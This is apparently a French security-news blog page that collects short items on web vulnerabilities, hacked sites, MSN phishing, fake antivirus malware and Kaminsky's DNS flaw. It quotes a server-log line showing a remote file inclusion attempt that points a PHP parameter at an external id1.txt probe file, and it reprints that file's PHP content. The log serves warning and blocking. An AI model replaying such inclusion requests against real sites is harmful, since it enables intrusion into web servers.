Vulnérabilité du type Remote File Upload (RFU) pour EZ-Oscommerce 3.1

See original here:
RFU pour EZ-Oscommerce 3.1

Vuln̩rabilit̩ du type Remote File Inclusion (RFI) pour OpenX РphpAdsNew

Read the original:
RFI pour OpenX – phpAdsNew

Vulnérabilité du type Remote File Upload (RFU) pour RapidLeech

Go here to read the rest:
RFU pour RapidLeech

Comment se désabonner d'un site ou  arrêter un prélèvement mensuel?
Comment vérifier si un site Web est sûr avant d'y laisser votre numéro de CB?
Comment se faire rembourser d'un débit abusif sur votre carte de crédit?

Cliquez sur www.viginet.fr plus d'informations au 08 99 23 23 87*
* lundi au samedi de 09h00 à 21h00 coût appel 1.35€+0.34€/mn

Le compte Twitter de la NASA piraté par des vendeurs de supports de télévisions.

Read more from the original source:
E.T. pirate le Twitter de la NASA

Leaseweb adresses IP douteuses

Adresses IP qui scannent les sites Web :

85.17.135.80
85.17.89.84
85.17.89.105

95.211.83.81
95.211.83.83
95.211.83.86
95.211.83.87
95.211.83.93

95.211.113.67
95.211.113.136
95.211.113.134

Tentative de piratage à partir de serveur OVH 213.251.189.201

Tentative de piratage à partir de serveur OVH 213.251.189.201
en utilisant un site Ukrainien hébérgé en Russie

00:00:00  Guest  gw1.ovh.net  17:05:04 17:05:04  /product_print.php?products_id=16046%20%20//extras/poll/poll.php?file_newsportal=http://www.nationalmedecine.com/forum/id1.txt?????
00:00:00  Guest  gw1.ovh.net  17:05:04 17:05:04  /product_print.php?products_id=16046%20%20//extras/poll/poll.php?file_newsportal=http://www.nationalmedecine.com/forum/id1.txt????? 

Adresse IP: 213.251.189.201
User Agent: Mozilla/5.0
Fichier id1.txt contenu sur www.nationalmedecine.com

<?php /* Fx29ID */ echo(« FeeL ». »CoMz »); die(« FeeL ». »CoMz »); /* Fx29ID */ ?>

 

http://www.nationalmedecine.com
Name:  www.nationalmedecine.com
IP:  89.111.170.132
    Korzun S. A.        ( mailto:nuzr@ukr.net)
    Kremlevskaya str 69-a, 157
    Zaporizhia
    Zaporizhia Oblast,69041
    UA
    Tel. +3.0662847994
address:        Garant-Park-Telecom, Ltd
                Alexander Panov
                Moscow State University
                Office 919, Building 9, Science Park MSU Vorobjevy Gory
                119992 Moscow
                RUSSIAN FEDERATION
phone:          +7 495 7833783
fax-no:         +7 495 9308800
e-mail:          mailto:routing@gpt.ru
Bloquez l’adresse OVH 213.251.189.201 sur vos sites
ou le réseau entier 213.251.189.

Exclusif : ImageShack a été victime, dans la nuit de vendredi à samedi, du passage du groupe de pirates prénommé Anti-sec.

View post:
Imageshack owned

Quatre pirates informatiques Tunisiens ont été arrêtés après avoir fait main basse sur des données bancaire.

Go here to read the rest:
Arrestations chez les pirates Tunisiens

Le site suédois Voddler.com va proposer de regarder, en streaming, films et séries TV en haute définition. Un internaute Français y a mis son nez et sa souris.

Originally posted here:
Voddler.com, streaming HD de films et séries piraté

Plusieurs milliers de faux comptes sont apparus dans les pages du site communautaire Twitter.

See more here:
Dimanche noir pour Twitter

Attention aux plugins de ce genre , ce ne sont que des pures conneries !

certains de vos contact msn messenger (ou windows live messenger ) vous enverrons automatiquement

ce genre de message a leur connexion :

_______________________________________________________________

Vince dit (11:29) :
*

http://PartyAlertz.com/?user=vincemalgorn?=DSC00245.JPG

http://PartyAlertz.com/?user=vincemalgorn?=DSC00482.JPG

http://PartyAlertz.com/?user=vincemalgorn?=DSC00697.JPG

http://PartyAlertz.com/?user=vincemalgorn?=DSC00984.JPG
(A)

_______________________________________________________________

(Vous pouvez allez voir comment c’est présenté , mais vous logger pas hein! , jsuis pas responsable si vous donner vos mots de passes)

ne vous logger pas sur ce genre de site , c’est une techniques pour vous piquer vos mots de passe msn!

il ne faut pas avoir confiance en ce genre de site , ce ne sont que des voleurs !

faites attention et vérifiez toujours la source (provenance) de ce genre de plu gins mal intentionné et l’auteur du programme , s’il est autorisé (officiellement) a publier ce genre d’application.

(Merci a la chaine TV Gameone pour avoir diffuser le nom  de ce site (CaCaWeb) très utiles ou les arnaques sont déjoués)

Ichigo

Sites piratés et infectés, vous proposent de télécharger le fichier AntivirusXP2008Installer.exe
fichier contenant le virus W32/Nuwar@MM

Sites dangereux:

scan.pc-antispyware-scanner.com dnld.antivirusdwl.com 85.255.119.150
UkrTeleGroup Ltd. Mechnikova 58/5 65029 Odessa Ukraine
Andrew Sotov abuse@ukrtelegroup.com.ua

Beaucoup de spams en ce moment qui vous envoient sur des sites hackés.
Si vous voyez un des ces 2 écrans … FUYEZ!
Si vous lancez le .EXE (souvent WATCH.EXE) vous aurez la visite du virus W32 Nuwar@MM

C’est à priori une attaque du type worm, le virus étant son propre serveur email donc la personne infectée risque de le propager ou son PC sera utilisé à d’autre type de spams.

Exemples de sites hackés:
http://www.neotronics.com.br/about.html
http://www.musiclothes.com/news.html
http://albeo.de/main.html
http://www.surge-expresscom/about.html
http://tsubarecords.com/about.html

 

Le spécialiste en sécurité Dan Kaminsky de IO Active, a découvert complètement par hasard, il y a six mois une faille DNS (DNS Cache Poisoning ) qui permettrait d’injecter des informations erronées dans les caches des serveurs DNS afin de détourner un trafic Web vers un site malveillant.

Il a alors réuni les grands groupes Internet (Apple, Microsoft, Cisco, Sun, Alcatel, …) sur le campus de Microsoft aux Etats-Unis qui ont planché discrètement pendant des mois pour mettre au point un correctif (patch). Le patch sera diffusé cette semaine aux entreprises et aux internautes, généralement via des mises à jour automatiques des systèmes.

Y’a-t-il un rapport avec la création au mois de Juin de l’Industry Consortium for Advancement of Security on the Internet (ICASI), groupe à but non lucratif ayant pour membres fondateurs Cisco, Intel, IBM et Juniper Networks et qui étudiera les moyens disponibles pour permettre à plusieurs entreprises de réagir à une seule menace de sécurité.

Microsoft a sorti quatre correctifs MS08-037 à 40 et informe que ces vulnérabilités touchent aussi l’application Office Word 2002 Service Pack 3 exclusivement. A partir du chargement d’un fichier .doc malformé la faille permet l’exécution d’un code distant.

Dan Kaminsky a mis en place un site www.doxpara.com pour permettre aux internautes de tester leur vulnérabilité à cette faille.

Un test effectué avec les DNS de CacaWEB.com : « Your name server, at xx.xx.xxx.xxx, appears vulnerable to DNS Cache Poisoning. »
Il y’a pas de quoi s’ inquiéter personne ne va détourner le traffic Web chez nous.

Saluant aussi le coté moral de Dan Kaminsky qui n’a pas cherché à monnayer sa découverte, il a préféré avertir publiquement. Une Bud pour Dan!.

MAJ: Le site a été nettoyé.

C’était à prévoir que la racaille allez en profiter de la libération d’Ingrid pour sévir sur le Web. Un site de la FICIB Fédération Internationale des Comités Ingrid Bétancourt a été piraté et infecté par

le trojan VBS/Psyme et JS/Exploit-BO.gen pour le compte des sites www.vidsniches.com et neiron2009.com